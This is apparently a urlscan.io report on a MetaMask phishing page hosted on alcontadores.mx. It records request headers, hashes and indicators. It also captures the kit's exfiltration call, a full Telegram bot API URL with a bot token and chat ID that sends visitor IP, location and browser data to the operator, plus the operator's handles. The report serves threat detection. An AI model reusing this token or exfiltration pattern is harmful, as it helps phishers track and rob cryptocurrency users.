65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

85fd6a1e873a1df34560bf7b37a9027e77a2a122d7e5d38f83f9f0f7c9069186

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Mon, 02 Oct 2023 04:06:44 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: application/javascript
accept-ranges: bytes
content-length: 9870
x-xss-protection: 1

GET
H/1.1 200
OK / Show response
api.ipify.org/ 22 B
222 B 317ms
95ms Fetch
application/json 104.237.62.212
WEBNX

General

Check archive.org

Show headers Download Go to

Full URL: https://api.ipify.org/?format=json
Requested by: Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
Protocol: HTTP/1.1
Security: TLS 1.3, , AES_128_GCM
Server: 104.237.62.212 El Segundo, United States, ASN18450 (WEBNX, US),
Reverse DNS: api.ipify.org
Software: nginx/1.25.2 /
Resource Hash: 30f3f3b376e1b2f21d04e79bacb8bfc970a17d787b9e5b05d5cc5f285a4e79f3

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

Access-Control-Allow-Origin: *
Date: Fri, 15 Dec 2023 16:30:31 GMT
Server: nginx/1.25.2
Connection: keep-alive
Content-Length: 22
Vary: Origin
Content-Type: application/json

GET
H2 200 / Show response
ipapi.co/json/ 776 B
909 B 211ms
141ms Fetch
application/json 2606:4700:20::681a:82c
CLOUDFLARENET

General

Check archive.org

Show headers Download Go to

Full URL

https://ipapi.co/json/

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.2, ECDHE_ECDSA, AES_128_GCM

Server

2606:4700:20::681a:82c , United States, ASN13335 (CLOUDFLARENET, US),

Reverse DNS

Software

cloudflare /

Resource Hash

cc6d9ae6b4db475cf459c8ea034cea4337b744db440df36ca4f0ee93f1c04ff2

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Frame-Options	DENY

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

date: Fri, 15 Dec 2023 16:30:31 GMT
content-encoding: br
x-content-type-options: nosniff
referrer-policy: same-origin
cf-cache-status: DYNAMIC
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
vary: Host, origin
allow: OPTIONS, POST, OPTIONS, HEAD, GET
content-type: application/json
access-control-allow-origin: https://alcontadores.mx
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=avKqr8kibMTygrfIqDVNlvOf7J11cnVJ%2F%2BiYWI%2BVuKwEwcZ5W2nDogBadg6xy7ycYpB%2FED1LO6biN76mSGgtXGfbkEgmwha5%2Fj2GspQFeYwSMptCT%2F%2F9YxJKlZSZIVfqwasWoMO1"}],"group":"cf-nel","max_age":604800}
x-frame-options: DENY
cf-ray: 83601253dc7a7472-MIA

GET
H2 200 bg.png
alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/ 115 KB
115 KB 109ms
109ms Image
image/png 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to Show image

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/bg.png

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/style.css

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache /

Resource Hash

b057d1f92f0f374b21b187eab453a1efbe3fe013c7967746d0fa9fcdc7fae0bd

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/style.css
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
last-modified: Fri, 12 May 2023 06:04:40 GMT
server: Apache
x-frame-options: SAMEORIGIN
content-type: image/png
accept-ranges: bytes
content-length: 117648
x-xss-protection: 1

GET
H2 500 EuclidCircularB-Regular-WebXL.ttf
alcontadores.mx/Metamassk/metta/MetaMask/app/fonts/ 0
0 110ms
109ms Font
text/html 65.99.252.128
AS17378

General

Check archive.org

Show headers Download Go to

Full URL

https://alcontadores.mx/Metamassk/metta/MetaMask/app/fonts/EuclidCircularB-Regular-WebXL.ttf

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/style.css

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

65.99.252.128 Pittsburgh, United States, ASN17378 (AS17378, US),

Reverse DNS

svgs171.serverneubox.com.mx

Software

Apache / PHP/7.4.33

Resource Hash

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Request headers

Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/MetaMask_fichiers/style.css
Origin: https://alcontadores.mx
accept-language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
date: Fri, 15 Dec 2023 16:30:30 GMT
x-content-type-options: nosniff
referrer-policy: no-referrer-when-downgrade
server: Apache
x-powered-by: PHP/7.4.33
x-frame-options: SAMEORIGIN
content-type: text/html; charset=UTF-8
content-length: 0
x-xss-protection: 1

GET
H2 400 sendMessage Show response
api.telegram.org/bot6003419806:AAEEQJ2WI6cUDj8jGTQVYdpn98qELpD_pco/ 56 B
263 B 473ms
143ms Fetch
application/json 2001:67c:4e8:f004::9
TELEGRAM

General

Check archive.org

Show headers Download Go to

Full URL

https://api.telegram.org/bot6003419806:AAEEQJ2WI6cUDj8jGTQVYdpn98qELpD_pco/sendMessage?chat_id=6192533086&text=%5B%20%F0%9F%94%94%20Metamask%20%20Visitors%20%F0%9F%A6%8A%20%5D%20%20%0A%F0%9F%8C%8E%20Location%3A%20Miami%2C%20Florida%2C%20US%0A%F0%9F%94%8D%20Public%20IP%3A%20http%3A%2F%2Fwww.geoiptool.com%2F%3FIP%3D38.132.118.74%0A%F0%9F%8C%90%20Browser%20Name%3A%20Netscape%0A%F0%9F%96%A5%20Browser%20Version%3A%205.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F120.0.6099.109%20Safari%2F537.36%0A%F0%9F%8F%B4%20Language%3A%20en-US%0A%0A%F0%9F%8C%9FSupport%20%F0%9F%8C%9F%20%0A%E2%9C%94%20Channel%20Telegram%20%3A%20%40Mrx_TawFiik%20%0A%E2%9C%94%2B%20My%20Account%20Contact%20me%20%3A%20%40MrxFawFiik%20%0A%0A

Requested by

Host: alcontadores.mx
URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/

Protocol

Security

TLS 1.3, , AES_256_GCM

Server

2001:67c:4e8:f004::9 Amsterdam, Netherlands, ASN62041 (TELEGRAM, VG),

Reverse DNS

Software

nginx/1.18.0 /

Resource Hash

a0a1e0f24b392c6da875c10977d169497a47f669b7e671e62330e125a56721fb

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000; includeSubDomains; preload

Request headers

accept-language: en-US,en;q=0.9
Referer: https://alcontadores.mx/Metamassk/metta/MetaMask/app/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.109 Safari/537.36

Response headers

access-control-allow-origin: *
date: Fri, 15 Dec 2023 16:30:31 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-expose-headers: Content-Length,Content-Type,Date,Server,Connection
server: nginx/1.18.0
content-length: 56
content-type: application/json

Verdicts & Comments Add Verdict or Comment

Potentially malicious activity detected
Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!

urlscan

Phishing against: Metamask (Crypto)

54 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

0 Cookies

Cookies are little pieces of information stored in the browser of a user. Whenever a user visits the site again, he will also send his cookie values, thus allowing the website to re-identify him even if he changed locations. This is how permanent logins work.

2 Console Messages

A page may trigger messages to the console to be logged. These are often error messages about being unable to load a resource or execute a piece of JavaScript. Sometimes they also provide insight into the technology behind a website.

Source	Level	URL Text
network	error	URL: https://alcontadores.mx/Metamassk/metta/MetaMask/app/fonts/EuclidCircularB-Regular-WebXL.ttf Message: Failed to load resource: the server responded with a status of 500 ()
network	error	URL: https://api.telegram.org/bot6003419806:AAEEQJ2WI6cUDj8jGTQVYdpn98qELpD_pco/sendMessage?chat_id=6192533086&text=%5B%20%F0%9F%94%94%20Metamask%20%20Visitors%20%F0%9F%A6%8A%20%5D%20%20%0A%F0%9F%8C%8E%20Location%3A%20Miami%2C%20Florida%2C%20US%0A%F0%9F%94%8D%20Public%20IP%3A%20http%3A%2F%2Fwww.geoiptool.com%2F%3FIP%3D38.132.118.74%0A%F0%9F%8C%90%20Browser%20Name%3A%20Netscape%0A%F0%9F%96%A5%20Browser%20Version%3A%205.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F120.0.6099.109%20Safari%2F537.36%0A%F0%9F%8F%B4%20Language%3A%20en-US%0A%0A%F0%9F%8C%9FSupport%20%F0%9F%8C%9F%20%0A%E2%9C%94%20Channel%20Telegram%20%3A%20%40Mrx_TawFiik%20%0A%E2%9C%94%2B%20My%20Account%20Contact%20me%20%3A%20%40MrxFawFiik%20%0A%0A Message: Failed to load resource: the server responded with a status of 400 ()

Security Headers

This page lists any security headers set by the main page. If you want to understand what these mean and how to use them, head on over to this page

Header	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	1

Indicators

This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.

ajax.googleapis.com
alcontadores.mx
api.ipify.org
api.telegram.org
ipapi.co
www.rb.gy
104.237.62.212
2001:67c:4e8:f004::9
2606:4700:20::681a:82c
2607:f8b0:4006:816::200a
44.207.55.129
65.99.252.128
0266be648c35fc4787752abda921c49dda0dbab7ca5645daf32d869e416f9300
115d5ad774f38ca49e06be632929e1d2f36dbb7c4ac875e7375fb42322de1022
11ae8d74c3da527bb66ff1822847b97d4a165e3b82e1a1408ec196b93ffabaac
30f3f3b376e1b2f21d04e79bacb8bfc970a17d787b9e5b05d5cc5f285a4e79f3
3213dcf52247c90f252a9adc644a128d58caf6e0a6e19186ed7da5ff34772900
5799c35105be07d1faff594cd3c7cbf13ddc0d7e9b0e99a7fcb76ac207cbb420
592d24544f32f46667cc962881544e7f505e203e4913a9393d37b1c724ab5659
5cd740de2fa35767446eab37428c28eadeb35a105948e3e2cfcb8a4d01296200
75f9c7a8b62b23b9d0519807c98f3805fcce274ea73dc85e9b6058633bbe5dd1
85fd6a1e873a1df34560bf7b37a9027e77a2a122d7e5d38f83f9f0f7c9069186
8b9e67a9204c49cadfdbab5977d2fc4e4fa205d0964d3af57542f4b29aaf091a
a0a1e0f24b392c6da875c10977d169497a47f669b7e671e62330e125a56721fb
abe57183266b029cd4ce1930f075bfd65390348a7c3d2a869af4ee0abf0941ca
b057d1f92f0f374b21b187eab453a1efbe3fe013c7967746d0fa9fcdc7fae0bd
b855851451c3eb7220bc7331d6cf7f19dad4580ebc35610211f028848ba7fc34
b9120cfb78e7b6c6a6703376f9ce4657cc477e303be23db671344c0e020e26ab
cc6d9ae6b4db475cf459c8ea034cea4337b744db440df36ca4f0ee93f1c04ff2
cfe967e9a2dba0ca7f01c8856bfb7011e14d7082535d16a9d10d6cc765f254b0
d17ffd37a4535ecee634848d22204de8e7f5ed39a462a077bd6506bf7c1fa8f6
e997a913e528255e99ac10b1159d69768ae82abd30c651ad1bfbf51c2b4665c1
f7f6a5894f1d19ddad6fa392b2ece2c5e578cbf7da4ea805b6885eb6985b6e3d

alcontadores.mx Open in urlscan Pro 65.99.252.128 Malicious Activity! Public Scan

Summary

urlscan.io Verdict: Potentially Malicious

Domain & IP information

Screenshot Live screenshot Full Image

Page Title

Page URL History Show full URLs

Detected technologies

Page Statistics

22 Requests

100 %HTTPS

50 %IPv6

6 Domains

6 Subdomains

5 IPs

2 Countries

320 kBTransfer

375 kBSize

0 Cookies

0 Outgoing links

Page URL History

Redirected requests

22 HTTP transactions Everything HTML Script AJAX CSS Image Expand all 0 data transactions

Request headers

Response headers

Redirect headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Request headers

Response headers

Verdicts & Comments Add Verdict or Comment

Potentially malicious activity detected Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!

urlscan

54 JavaScript Global Variables

0 Cookies

2 Console Messages

Security Headers

Indicators

alcontadores.mx Open in urlscan Pro
65.99.252.128 Malicious Activity! Public Scan

Screenshot
Live screenshot

Full Image

22
Requests

100 %
HTTPS

50 %
IPv6

6
Domains

6
Subdomains

5
IPs

2
Countries

320 kB
Transfer

375 kB
Size

0
Cookies

22 HTTP transactions
0 data transactions

Potentially malicious activity detected
Disclaimer: These verdicts should be used to detect potentially malicious websites, not as a final verdict!